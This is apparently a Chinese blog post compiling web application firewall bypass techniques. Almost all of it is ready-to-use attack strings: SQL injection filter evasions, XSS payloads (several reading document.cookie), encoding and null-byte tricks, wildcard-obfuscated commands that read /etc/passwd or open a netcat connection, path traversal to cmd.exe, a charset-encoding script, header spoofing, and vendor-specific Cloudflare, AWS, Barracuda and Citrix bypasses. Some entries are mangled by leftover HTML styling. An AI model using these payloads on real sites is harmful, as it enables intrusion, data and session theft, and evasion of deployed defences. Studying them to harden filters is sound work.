各种WAF绕过手法学习

admin

0X00    Fuzz/爆破
fuzz字典
1.Seclists/Fuzzing
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing
2.Fuzz-DB/Attack
https://github.com/fuzzdb-project/fuzzdb/tree/master/attack
3.Other Payloads 可能会被ban ip，小心为妙。
https://github.com/foospidy/payloads

0X01    正则绕过

Case: SQL 注入
Step 1:

1. 过滤关键词: and, or, union
   
2. 可能正则: preg_match('/(and|or|union)/i', $id)
   
3. 被拦截的语句: union select user, password from users
   
4. 
   
5. bypass语句: 1 || (select user from users where user_id = 1) = 'admin'

复制代码

Step 2:

1. 过滤关键词: and, or, union, where
   
2. 被拦截的语句: 1 || (select user from users where user_id = 1) = 'admin'
   
3. 
   
4. bypass语句: 1 || (select user from users limit 1) = 'admin'

复制代码

Step 3:

1. 过滤关键词: and, or, union, where, limit
   
2. 被拦截的语句: 1 || (select user from users limit 1) = 'admin'
   
3. 
   
4. bypass语句: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

复制代码

Step 4:

1. 过滤关键词: and, or, union, where, limit, group by
   
2. 被拦截的语句: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
   
3. 
   
4. bypass语句: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1

复制代码

Step 5:

1. 过滤关键词: and, or, union, where, limit, group by, select
   
2. 
   
3. 被拦截的语句: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
   
4. 
   
5. bypass语句: 1 || 1 = 1 into outfile 'result.txt'
   
6. bypass语句: 1 || substr(user,1,1) = 'a'

复制代码

Step 6:

1. 过滤关键词: and, or, union, where, limit, group by, select, '
   
2. 
   
3. 被拦截的语句: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
   
4. 
   
5. bypass语句: 1 || user_id is not null
   
6. bypass语句: 1 || substr(user,1,1) = 0x61
   
7. bypass语句: 1 || substr(user,1,1) = unhex(61)

复制代码

Step 7:

1. 过滤关键词: and, or, union, where, limit, group by, select, ', hex
   
2. 被拦截的语句: 1 || substr(user,1,1) = unhex(61)
   
3. 
   
4. bypass语句: 1 || substr(user,1,1) = lower(conv(11,10,36))

复制代码

Step 8:

1. 过滤关键词: and, or, union, where, limit, group by, select, ', hex, substr
   
2. 被拦截的语句: 1 || substr(user,1,1) = lower(conv(11,10,36))
   
3. 
   
4. bypass语句: 1 || lpad(user,7,1)

复制代码

Step 9:

1. 过滤关键词: and, or, union, where, limit, group by, select, ', hex, substr, white space
   
2. 被拦截的语句: 1 || lpad(user,7,1)
   
3. 
   
4. bypass语句: 1%0b||%0blpad(user,7,1)

复制代码

0X02    混淆/编码

1.大小写

1. 标准: <script>alert()</script>
   
2. Bypassed: <ScRipT>alert()</sCRipT>
   
3. 
   
4. 标准: SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'
   
5. Bypassed: sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'

复制代码

2.URL编码

1. 被阻断语句: <svG/x=">"/oNloaD=confirm()//
   
2. Bypassed: %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F
   
3. 
   
4. 被阻断语句: uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)
   
5. Bypassed: uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29

复制代码

3.Unicode编码

1. 标准: <marquee onstart=prompt()>
   
2. 混淆: <marquee onstart=\u0070r\u06f\u006dpt()>
   
3. 
   
4. 被阻断语句: /?redir=http://google.com
   
5. Bypassed: /?redir=http://google。com (Unicode 替代)
   
6. 
   
7. 被阻断语句: <marquee loop=1 onfinish=alert()>x
   
8. Bypassed: ＜marquee loop＝1 onfinish＝alert︵1)>x (Unicode 替代)
   
9. 
   
10. TIP: 查看这些说明 this and this reports on HackerOne. :)

复制代码

4.HTML实体编码

1. <span style="color: rgb(171, 178, 191); font-family: monospace; font-size: 14.45px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(40, 44, 52); text-decoration-style: initial; text-decoration-color: initial; display: inline !important; float: none;">标准: "></span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(171, 178, 191); font-family: monospace; font-size: 14.45px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration: none solid rgb(171, 178, 191); background: rgba(0, 0, 0, 0); display: inline; width: 192px;"><<span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(224, 108, 117); background: rgba(0, 0, 0, 0); display: inline; width: 20px; text-decoration: none solid rgb(224, 108, 117); font-weight: 400; font-style: normal;">img</span> <span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(209, 154, 102); background: rgba(0, 0, 0, 0); display: inline; width: 20px; text-decoration: none solid rgb(209, 154, 102); font-weight: 400; font-style: normal;">src</span>=<span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(152, 195, 121); background: rgba(0, 0, 0, 0); display: inline; width: 6px; text-decoration: none solid rgb(152, 195, 121); font-weight: 400; font-style: normal;">x</span> <span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(209, 154, 102); background: rgba(0, 0, 0, 0); display: inline; width: 46px; text-decoration: none solid rgb(209, 154, 102); font-weight: 400; font-style: normal;">onerror</span>=<span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(152, 195, 121); background: rgba(0, 0, 0, 0); display: inline; width: 59px; text-decoration: none solid rgb(152, 195, 121); font-weight: 400; font-style: normal;">confirm()</span>></span>
   
2. <span style="color: rgb(171, 178, 191); font-family: monospace; font-size: 14.45px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(40, 44, 52); text-decoration-style: initial; text-decoration-color: initial; display: inline !important; float: none;">Encoded: &quot;&gt;&lt;img src=x onerror=confirm&lpar;&rpar;&gt; (General form)</span>
   
3. <span style="color: rgb(171, 178, 191); font-family: monospace; font-size: 14.45px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(40, 44, 52); text-decoration-style: initial; text-decoration-color: initial; display: inline !important; float: none;">Encoded: &#34;&#62;&#60;img src=x onerror=confirm&#40;&#41;&#62; (Numeric reference)</span>

复制代码

5.混合编码

1. Sometimes, WAF rules often tend to filter out a specific type of encoding.
   
2. 
   
3. This type of filters can be bypassed by mixed encoding payloads.
   
4. 
   
5. Tabs and newlines further add to obfuscation.

复制代码

6.混淆

1. <A HREF="h
   
2. tt p://6 6.000146.0x7.147/">XSS</A>

复制代码

7. 双重URL编码

1. 这个需要服务端多次解析了url编码
   
2. 
   
3. 标准: http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\
   
4. 混淆: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\
   
5. 
   
6. 标准: <script>alert()</script>
   
7. 混淆: %253Cscript%253Ealert()%253C%252Fscript%253E

复制代码

8. 通配符使用

1. 用于linux命令语句注入，通过shell通配符绕过
   
2. 
   
3. 标准: /bin/cat /etc/passwd
   
4. 混淆: /???/??t /???/??ss??
   
5. Used chars: / ? t s
   
6. 
   
7. 标准: /bin/nc 127.0.0.1 1337
   
8. 混淆: /???/n? 2130706433 1337
   
9. Used chars: / ? n [0-9]

复制代码

9. 动态payload 生成

1. 标准: <script>alert()</script>
   
2. 混淆: <script>eval('al'+'er'+'t()')</script>
   
3. 
   
4. 标准: /bin/cat /etc/passwd
   
5. 混淆: /bi'n'''/c''at' /e'tc'/pa''ss'wd
   
6. 
   
7. Bash allows path concatenation for execution.
   
8. 
   
9. 标准: <iframe/onload='this["src"]="javascript:alert()"';>
   
10. 混淆: <iframe/onload='this["src"]="jav"+"as        cr"+"ipt:al"+"er"+"t()"';>

复制代码

10. 垃圾字符

1. Normal payloads get filtered out easily.
   
2. Adding some junk chars helps avoid detection (specific cases only).
   
3. They often help in confusing regex based firewalls.
   
4. 
   
5. 
   
6. 标准: <script>alert()</script>
   
7. 混淆: <script>+-+-1-+-+alert(1)</script>
   
8. 
   
9. 标准: <BODY onload=alert()>
   
10. 混淆: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert()>

复制代码

NOTE: 上述语句可能会破坏正则的匹配，达到绕过。
11. 插入换行符

1. 部分waf可能会对换行符没有匹配
   
2. 
   
3. 标准: <iframe src=javascript:confirm(0)">
   
4. 混淆: <iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(0)">

复制代码

12. 未定义变量

1. bash 和 perl 执行脚本中加入未定义变量，干扰正则。

复制代码

TIP: 随便写个不存在的变量就好。$aaaa,$sdayuhjbsad,$dad2ed都可以。

1. Level 1 Obfuscation: Normal
   
2. 标准: /bin/cat /etc/passwd
   
3. 混淆: /bin/cat$u /etc/passwd$u
   
4. 
   
5. Level 2 Obfuscation: Postion Based
   
6. 标准: /bin/cat /etc/passwd
   
7. 混淆: $u/bin$u/cat$u $u/etc$u/passwd$u
   
8. 
   
9. Level 3 Obfuscation: Random characters
   
10. 标准: /bin/cat /etc/passwd
    
11. 混淆: $aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff
    
12. 
    
13. 一个精心制作的payload
    
14. 
    
15. $sdijchkd/???$sdjhskdjh/??t$skdjfnskdj $sdofhsdhjs/???$osdihdhsdj/??ss??$skdjhsiudf

复制代码

13.Tab 键和换行符

1. 大多数waf匹配的是空格不是Tab
   
2. 
   
3. 标准: <IMG SRC="javascript:alert();">
   
4. Bypassed: <IMG SRC=" javascript:alert();">
   
5. 变形: <IMG SRC=" jav ascri pt:alert ();">
   
6. 
   
7. 标准: http://test.com/test?id=1 union select 1,2,3
   
8. 标准: http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3
   
9. 
   
10. 标准: <iframe src=javascript:alert(1)></iframe>
    
11. 混淆:
    
12. 
    
13. <iframe    src=j        a        v        a        s        c        r        i        p        t        :a        l        e        r        t        %28        1        %29></iframe>

复制代码

14. Token Breakers(翻译不了 看起来说的就是sql注入闭合)

1. Attacks on tokenizers attempt to break the logic of splitting a request into tokens with the help of token breakers.
   
2. Token breakers are symbols that allow affecting the correspondence between an element of a string and a certain token, and thus bypass search by signature.
   
3. However, the request must still remain valid while using token-breakers.

复制代码

1. Case: Unknown Token for the Tokenizer
   
2. 
   
3. Payload: ?id=‘-sqlite_version() UNION SELECT password FROM users --
   
4. 
   
5. Case: Unknown Context for the Parser (Notice the uncontexted bracket)
   
6. 
   
7. Payload 1: ?id=123);DROP TABLE users --
   
8. 
   
9. Payload 2: ?id=1337) INTO OUTFILE ‘xxx’ --

复制代码

TIP: 更多payload可以看这里 cheat sheet.

15. 其他格式混淆


Case: IIS

1. IIS6, 7.5, 8 and 10 (ASPX v4.x) 允许 IBM037 字符
   
2. 
   
3. 可以发送编码后的参数名和值

复制代码

原始请求:

1. POST /sample.aspx?id1=something HTTP/1.1
   
2. HOST: victim.com
   
3. Content-Type: application/x-www-form-urlencoded; charset=utf-8
   
4. Content-Length: 41
   
5. 
   
6. id2='union all select * from users--

复制代码

混淆请求 + URL Encoding:

1. POST /sample.aspx?%89%84%F1=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1
   
2. HOST: victim.com
   
3. Content-Type: application/x-www-form-urlencoded; charset=ibm037
   
4. Content-Length: 115
   
5. 
   
6. %89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60

复制代码

TIP: 可以使用 这个小脚本 来转化编码

1. import urllib.parse, sys
   
2. from argparse import ArgumentParser
   
3. lackofart = '''
   
4.         OBFUSCATOR
   
5. '''
   
6. 
   
7. def paramEncode(params="", charset="", encodeEqualSign=False, encodeAmpersand=False, urlDecodeInput=True, urlEncodeOutput=True):
   
8.     result = ""
   
9.     equalSign = "="
   
10.     ampersand = "&"
    
11.     if '=' and '&' in params:
    
12.         if encodeEqualSign:
    
13.             equalSign = equalSign.encode(charset)
    
14.         if encodeAmpersand:
    
15.             ampersand = ampersand.encode(charset)
    
16.         params_list = params.split("&")
    
17.         for param_pair in params_list:
    
18.             param, value = param_pair.split("=")
    
19.             if urlDecodeInput:
    
20.                 param = urllib.parse.unquote(param)
    
21.                 value = urllib.parse.unquote(value)
    
22.             param = param.encode(charset)
    
23.             value = value.encode(charset)
    
24.             if urlEncodeOutput:
    
25.                 param = urllib.parse.quote_plus(param)
    
26.                 value = urllib.parse.quote_plus(value)
    
27.             if result:
    
28.                 result += ampersand
    
29.             result += param + equalSign + value
    
30.     else:
    
31.         if urlDecodeInput:
    
32.             params = urllib.parse.unquote(params)
    
33.         result = params.encode(charset)
    
34.         if urlEncodeOutput:
    
35.             result = urllib.parse.quote_plus(result)
    
36.     return result
    
37. 
    
38. def main():
    
39.     print(lackofart)
    
40.     parser = ArgumentParser('python3 obfu.py')
    
41.     parser._action_groups.pop()
    
42. 
    
43.     # A simple hack to have required arguments and optional arguments separately
    
44.     required = parser.add_argument_group('Required Arguments')
    
45.     optional = parser.add_argument_group('Optional Arguments')
    
46. 
    
47.     # Required Options
    
48.     required.add_argument('-s', '--str', help='String to obfuscate', dest='str')
    
49.     required.add_argument('-e', '--enc', help='Encoding type. eg: ibm037, utf16, etc', dest='enc')
    
50. 
    
51.     # Optional Arguments (main stuff and necessary)
    
52.     optional.add_argument('-ueo', help='URL Encode Output', dest='ueo', action='store_true')
    
53.     optional.add_argument('-udi', help='URL Decode Input', dest='udi', action='store_true')
    
54.     args = parser.parse_args()
    
55.     if not len(sys.argv) > 1:
    
56.         parser.print_help()
    
57.         quit()
    
58.     print('Input: %s' % (args.str))
    
59.     print('Output: %s' % (paramEncode(params=args.str, charset=args.enc, urlDecodeInput=args.udi, urlEncodeOutput=args.ueo)))
    
60. 
    
61. if __name__ == '__main__':
    
62.     main()

复制代码

0X04    HTTP 参数污染
手法

1. 这种攻击方法基于服务器如何解释具有相同名称的参数
   
2. 可能造成bypass的情况:
   
3. 服务器使用最后接收到的参数，WAF只检查第一个参数
   
4. 服务器将来自类似参数的值联合起来，WAF单独检查它们

复制代码

下面是相关服务器对参数解释的比较

环境

参数解析

示例

ASP/IIS用逗号连接par1=val1,val2
JSP, Servlet/Apache Tomcat第一个参数是结果par1=val1
ASP.NET/IIS用逗号连接par1=val1,val2
PHP/Zeus最后一个参数是结果par1=val2
PHP/Apache最后一个参数是结果par1=val2
JSP, Servlet/Jetty第一个参数是结果par1=val1
IBM Lotus Domino第一个参数是结果par1=val1
IBM HTTP Server最后一个参数是结果par1=val2
mod_perl, libapeq2/Apache第一个参数是结果par1=val1
Oracle Application Server 10G第一个参数是结果par1=val1
Perl CGI/Apache第一个参数是结果par1=val1
Python/Zope第一个参数是结果par1=val1
IceWarp返回一个列表[‘val1’,’val2’]
AXIS 2400最后一个参数是结果par1=val2
DBMan由两个波浪号连接起来par1=val1~~val2
mod-wsgi (Python)/Apache返回一个列表ARRAY(0x8b9058c)


0X05    浏览器的缺陷


Charset Bugs:

1. 可以尝试 修改 charset header to 更高的 Unicode (eg. UTF-32)
   
2. 
   
3. 当网站解码的时候，触发payload

复制代码

Example request:

1. GET /page.php?p=∀㸀㰀script㸀alert(1)㰀/script㸀 HTTP/1.1
   
2. Host: site.com
   
3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
   
4. Accept-Charset:utf-32; q=0.5<
   
5. Accept-Language: en-US,en;q=0.5
   
6. Accept-Encoding: gzip, deflate

复制代码

当站点加载时，将其编码为我们设置的UTF-32编码，然后由于页面的输出编码为UTF-8，将其呈现为:"<script>alert (1) </ script> 从而触发xss

完整url编码后的 payload:

1. %E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80

复制代码

Null 空字节
空字节通常用作字符串终止符

1. Payload 示例:
   
2. 
   
3. <scri%00pt>alert(1);</scri%00pt>
   
4. <scri\x00pt>alert(1);</scri%00pt>
   
5. <s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
   
6. 标准: <a href="javascript:alert()">
   
7. 混淆: <a href="ja0x09vas0x0A0x0Dcript:alert(1)">clickme</a>
   
8. 变形: <a 0x00 href="javascript:alert(1)">clickme</a>

复制代码

解析错误

1. RFC 声明节点名不可以由空白起始
   
2. 
   
3. 但是我们可以使用特殊字符 ` %, //, !, ?`, etc.
   
4. 
   
5. 例子:
   
6. 
   
7. <// style=x:expression\28write(1)\29> - Works upto IE7 (Source)
   
8. 
   
9. <!--[if]><script>alert(1)</script --> - Works upto IE9 (Reference)
   
10. 
    
11. <?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/> - Works in IE7 (Reference)
    
12. 
    
13. <%div%20style=xss:expression(prompt(1))> - Works Upto IE7

复制代码

Unicode 分隔符
每个浏览器有不同的分隔分隔符
@Masato Kinugawafuzz 后发现如下

1. IExplorer: 0x09, 0x0B, 0x0C, 0x20, 0x3B
   
2. 
   
3. Chrome: 0x09, 0x20, 0x28, 0x2C, 0x3B
   
4. 
   
5. Safari: 0x2C, 0x3B
   
6. 
   
7. FireFox: 0x09, 0x20, 0x28, 0x2C, 0x3B
   
8. 
   
9. Opera: 0x09, 0x20, 0x2C, 0x3B
   
10. 
    
11. Android: 0x09, 0x20, 0x28, 0x2C, 0x3B

复制代码

1. <a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>pwn3d
   

复制代码

使用其他非典型等效语法结构替换

找的waf开发人员没有注意到的语句进行攻击
一些WAF开发人员忽略的常见关键字:

• JavaScript functions:
  
  
  • window
  • parent
  • this
  • self
    
    
• Tag attributes:
  
  
  • onwheel
  • ontoggle
  • onfilterchange
  • onbeforescriptexecute
  • ondragstart
  • onauxclick
  • onpointerover
  • srcdoc
    
    

SQL Operators

lpad

1. lpad( string, padded_length, [ pad_string ] ) lpad函数从左边对字符串使用指定的字符进行填充
   
2.   lpad('tech', 7); 将返回' tech'
   
3.   lpad('tech', 2); 将返回'te'
   
4.   lpad('tech', 8, '0'); 将返回'0000tech'
   
5.   lpad('tech on the net', 15, 'z'); 将返回'tech on the net'
   
6.   lpad('tech on the net', 16, 'z'); 将返回'ztech on the net

复制代码

field

1. FIELD(str,str1,str2,str3,...)
   
2. 返回的索引（从1开始的位置）的str在str1，str2，STR3，...列表中。如果str没有找到，则返回0。
   
3. +---------------------------------------------------------+
   
4. | FIELD('ej', 'Hej', 'ej', 'Heja', 'hej', 'foo') |
   
5. +---------------------------------------------------------+
   
6. | 2                                                       |
   
7. +---------------------------------------------------------+

复制代码

bit_count 二进制数中包含1的个数。BIT_COUNT(10);因为10转成二进制是1010，所以该结果就是2

示例payloads:

1. Case: XSS
   
2. <script>window['alert'](0)</script>
   
3. <script>parent['alert'](1)</script>
   
4. <script>self['alert'](2)</script>
   
5. Case: SQLi
   
6. SELECT if(LPAD(' ',4,version())='5.7',sleep(5),null);
   
7. 1%0b||%0bLPAD(USER,7,1)
   
8. 可以使用许多替代原生JavaScript的方法:

复制代码

JSFuck

JJEncode

XChars.JS

滥用SSL/TLS密码:

1. 很多时候，服务器可以接收各种SSL/TLS密码和版本的连接。
   
2. 初始化到waf不支持的版本
   
3. 找出waf支持的密码(通常WAF供应商文档对此进行了讨论)。
   
4. 找出服务器支持的密码(SSLScan这种工具可以帮助到你)。
   
5. 找出服务器支持但waf不支持的

复制代码

Tool: abuse-ssl-bypass-waf

滥用 DNS 记录:

• 找到云waf后的源站
  
  

TIP: 一些在线资源 IP History 和 DNS Trails

Tool: bypass-firewalls-by-DNS-history

1. bash bypass-firewalls-by-DNS-history.sh -d <target> --checkall
   

复制代码

请求头欺骗

让waf以为请求来自于内部网络，进而不对其进行过滤。

添加如下请求头

1. X-Originating-IP: 127.0.0.1
   
2. X-Forwarded-For: 127.0.0.1
   
3. X-Remote-IP: 127.0.0.1
   
4. X-Remote-Addr: 127.0.0.1
   
5. X-Client-IP: 127.0.0.1

复制代码

Google Dorks Approach:

应对已知WAF的绕过

搜索语法:Normal search:

+<wafname> waf bypass

Searching for specific version exploits:
"<wafname> <version>" (bypass|exploit)

For specific type bypass exploits:
"<wafname>" +<bypass type> (bypass|exploit)

On Exploit DB:
site:exploit-db.com +<wafname> bypass

On 0Day Inject0r DB:
site:0day.today +<wafname> <type> (bypass|exploit)

On Twitter:
site:twitter.com +<wafname> bypass

On Pastebin
site:pastebin.com +<wafname> bypass

0X06  拓展Bypass姿势

Airlock Ergon

1. SQLi Overlong UTF-8 Sequence Bypass (>= v4.2.4) by @Sec Consult
   
2. 
   
3. %C0%80'+union+select+col1,col2,col3+from+table+--+

复制代码

AWS
SQLi Bypass by @enkaskal

1. "; select * from TARGET_TABLE --

复制代码

XSS Bypass by @kmkz

1. <script>eval(atob(decodeURIComponent("payload")))//

复制代码

BarracudaCross Site Scripting by @WAFNinja

1. <body style="height:1000px" onwheel="alert(1)">
   
2. <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
   
3. <b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>

复制代码

XSS Bypass by @0xInfection

1. <a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhere

复制代码

Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit) by @xort

Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit) by @xort

Cerber (WordPress)

Username Enumeration Protection Bypass by HTTP Verb Tampering by @ed0x21son

1. POST host.com HTTP/1.1
   
2. Host: favoritewaf.com
   
3. User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
   
4. 
   
5. author=1

复制代码

Protected Admin Scripts Bypass by @ed0x21son

1. http://host/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils
   
2. http://host/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar

复制代码

REST API Disable Bypass by @ed0x21son

1. http://host/index.php/wp-json/wp/v2/users/

复制代码

Citrix NetScaler

SQLi via HTTP Parameter Pollution (NS10.5) by @BGA Security

1. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   
2.    <soapenv:Header/>
   
3.    <soapenv:Body>
   
4.         <string>’ union select current_user, 2#</string>
   
5.     </soapenv:Body>
   
6. </soapenv:Envelope>

复制代码

generic_api_call.pl XSS by @NNPoster

1. http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e
   

复制代码

Cloudflare
HTML Injection by @spyerror

1. <div style="background:url(/f#oo/;color:red/*/foo.jpg);">X

复制代码

XSS Bypass by @c0d3g33k

1. <a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>test</a>

复制代码

XSS Bypasses by @Bohdan Korzhynskyi

1. <svg onload=prompt%26%230000000040document.domain)>
   
2. <svg onload=prompt%26%23x000000028;document.domain)>
   
3. xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
   
4. 1'"><img/src/onerror=.1|alert``>

复制代码

XSS Bypass by @RakeshMane10

1. <section data-mpa-preserve-tpl-color="t" data-mpa-template="t" class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, &quot;Helvetica Neue&quot;, &quot;PingFang SC&quot;, &quot;Hiragino Sans GB&quot;, &quot;Microsoft YaHei UI&quot;, &quot;Microsoft YaHei&quot;, Arial, sans-serif; font-size: 17px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-style: initial; text-decoration-color: initial;"><pre style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; background: none;"><code class="" style="margin: 0px 0.15em; padding: 5.95px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; border-radius: 4px; font-size: 0.85em; background: rgb(40, 44, 52); color: rgb(171, 178, 191); display: block; overflow-x: auto; white-space: nowrap;"><svg/onload=&<span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(92, 99, 112); background: rgba(0, 0, 0, 0); display: inline; width: 283px; text-decoration: none solid rgb(92, 99, 112); font-weight: 400; font-style: italic;">#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f</span></code></pre></section>

复制代码

XSS Bypass by @ArbazKiraak

1. <span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(171, 178, 191); font-family: monospace; font-size: 14.45px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration: none solid rgb(171, 178, 191); background: rgba(0, 0, 0, 0); display: inline; width: 824px;"><<span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(224, 108, 117); background: rgba(0, 0, 0, 0); display: inline; width: 7px; text-decoration: none solid rgb(224, 108, 117); font-weight: 400; font-style: normal;">a</span> <span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(209, 154, 102); background: rgba(0, 0, 0, 0); display: inline; width: 26px; text-decoration: none solid rgb(209, 154, 102); font-weight: 400; font-style: normal;">href</span>=<span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(152, 195, 121); background: rgba(0, 0, 0, 0); display: inline; width: 765px; text-decoration: none solid rgb(152, 195, 121); font-weight: 400; font-style: normal;">"j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this['document']['cookie']&rpar;"</span>></span><span style="color: rgb(171, 178, 191); font-family: monospace; font-size: 14.45px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(40, 44, 52); text-decoration-style: initial; text-decoration-color: initial; display: inline !important; float: none;">X</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(171, 178, 191); font-family: monospace; font-size: 14.45px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration: none solid rgb(171, 178, 191); background: rgba(0, 0, 0, 0); display: inline; width: 27px;"></<span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(224, 108, 117); background: rgba(0, 0, 0, 0); display: inline; width: 7px; text-decoration: none solid rgb(224, 108, 117); font-weight: 400; font-style: normal;">a</span>></span><span style="color: rgb(171, 178, 191); font-family: monospace; font-size: 14.45px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(40, 44, 52); text-decoration-style: initial; text-decoration-color: initial; display: inline !important; float: none;">`</span>

复制代码

XSS Bypass by @Ahmet Ümit

